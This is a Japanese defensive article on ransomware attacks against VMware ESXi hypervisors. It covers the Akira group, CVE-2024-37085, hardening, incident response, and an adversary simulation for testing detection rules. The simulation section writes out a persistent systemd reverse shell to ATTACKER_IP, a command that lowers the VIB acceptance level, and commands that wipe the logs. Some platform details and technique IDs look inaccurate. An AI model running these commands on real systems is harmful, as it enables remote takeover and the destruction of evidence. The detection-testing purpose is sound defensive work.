ESXi を標的とするランサムウェア: 実践的なハイパーバイザの強化防御策

概要

この記事では、仮想マシンの大規模な暗号化を可能にするためにVMware ESXiのようなハイパーバイザープラットフォームに向けたランサムウェアの動向について述べています。敵対者は盗まれた管理者資格情報とネイティブ管理ユーティリティを利用して従来のエンドポイント防御を回避します。主な脅威アクターとして取り上げられるのはAkiraランサムウェアグループです。議論は、ハイパーバイザーのレベルで強力なハードニングの重要性に焦点を当てています。

調査

2025年のHuntressのケースデータは、ハイパーバイザーに焦点を当てたランサムウェアの急増を示しており、観察されたインシデントの3％から25％に上昇しています。調査員は、Hyper-VおよびESXi管理ツールの悪用、環境間の資格情報の再利用、CVE-2024-37085の悪用による管理権限の獲得を記録しました。分析において、攻撃者は頻繁にSSHを有効にし、ロックダウンモードをオフにし、ランサムウェアペイロードをプッシュする前にVIB受け入れポリシーを変更すると述べられています。

緩和策

主な緩和措置には、多要素認証（MFA）の実施、専用のローカルESXiアカウントの使用、管理ネットワークの分割および隔離、バスティオンホストの展開、最小特権アクセスの適用、VMkernel.Boot.execInstalledOnlyの有効化が含まれます。組織はまた、CVE-2024-37085のような既知の脆弱性にパッチを適用し、SLPのような非必須サービスを無効化してハイパーバイザーの攻撃面を減少させるべきです。

対応

検出時には、組織はESXiログをSIEMにストリームし、疑わしい設定変更を警告し、侵害されたホストを隔離し、イミュータブルなバックアップやスナップショットからの復旧を開始すべきです。インシデントレスポンス手順には、認証ログ、hostdログ、VIB変更の法医学的取得を含め、その後迅速な仮想マシンの復元が含まれるべきです。

シミュレーションの実行

前提条件: テレメトリーおよびベースラインプリフライトチェックに合格している必要があります。

理由: このセクションは、検出ルールを起動するために設計された敵対者の技術（TTP）の正確な実行を詳細に説明します。コマンドと説明は特定されたTTPを直接反映し、検出ロジックによって予期されるテレメトリーを正確に生成することを目的としています。抽象的または関連性のない例は誤診につながります。

• 攻撃の説明とコマンド:

  1. 初期アクセス (T1563.001 – SSH):
     攻撃者は盗まれたrootの資格情報を用いてESXiホストへのSSHセッションを開き、新しいrootログインイベントを生成します。

  2. 特権のハードニング (T1553.004 – VIB受け入れの変更):
     ログインすると、攻撃者はVIB受け入れレベルを下げて署名されていないモジュールのロードを許可します:

     esxcli system settings advanced set -o /VMFS3/AcceptanceLevel -s "CommunitySupported"

  3. サービス有効化による永続化 (T1569):
     攻撃者は起動時にリバースシェルを起動する悪意のあるsystemdサービスを作成し、それを有効にします:

     cat <<'EOF' > /etc/systemd/system/malicious-revshell.service
     [Unit]
     Description=Malicious Reverse Shell
     
     [Service]
     ExecStart=/bin/bash -c 'while true; do /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; sleep 60; done'
     
     [Install]
     WantedBy=multi-user.target
     EOF
     
     systemctl daemon-reload
     systemctl enable malicious-revshell.service
     systemctl start malicious-revshell.service

  4. クリーンアップ回避 (T1070 / T1070.001):
     攻撃者は、検出を回避しようとしてESXiホストの監査ログをクリアします:

     > /var/log/auth.log
     > /var/log/syslog

  5. ルールを起動させる:
     Sigmaルールが発火するように、攻撃者はまた、次のloggerユーティリティを使用して文字どおりのEventID文字列を放出します（これらは、ルールが監視している不安定な「新しいrootログイン」、「サービス有効化」、および「VIB受け入れ変更」イベントをエミュレートします）。

• 回帰テストスクリプト:

  #!/usr/bin/env bash
  #
  # Sigmaルールが予期する正確なテレメトリーをシミュレートします。
  # このスクリプトはESXiホスト上（またはログをSIEMに転送する任意のLinuxホスト上）で実行されます。
  
  set -euo pipefail
  
  echo "[*] 不正なrootログインイベントをシミュレートしています"
  logger -p authpriv.notice "新しいrootログイン"
  
  echo "[*] サービス有効化イベントをシミュレートしています"
  logger -p authpriv.notice "サービス有効化"
  
  echo "[*] VIB受入レベル変更イベントをシミュレートしています"
  logger -p authpriv.notice "VIB受入変更"
  
  # オプション: 詳細な検証のために、実際の悪意のある行動を行う（安全のためにコメントアウト）
  # esxcli system settings advanced set -o /VMFS3/AcceptanceLevel -s "CommunitySupported"
  # systemctl enable malicious-revshell.service
  # systemctl start malicious-revshell.service
  
  echo "[+] シミュレーション完了。SIEMでアラートを確認してください。"

• クリーンアップコマンド:

  # 作成したログエントリを削除します（SIEMがそれらを保持している場合）
  logger -p authpriv.notice "クリーンアップ: テストEventIDsを削除しています"
  
  # 悪意のあるサービスを停止して無効にします（実際に作成された場合）
  systemctl stop malicious-revshell.service || true
  systemctl disable malicious-revshell.service || true
  rm -f /etc/systemd/system/malicious-revshell.service
  systemctl daemon-reload
  
  # オリジナルのログファイルを復元します（削除されていた場合）
  # 注意: リアルな環境では、バックアップから復元します。
  echo "[*] ログファイルがバックアップから復元されました（手動ステップ）。"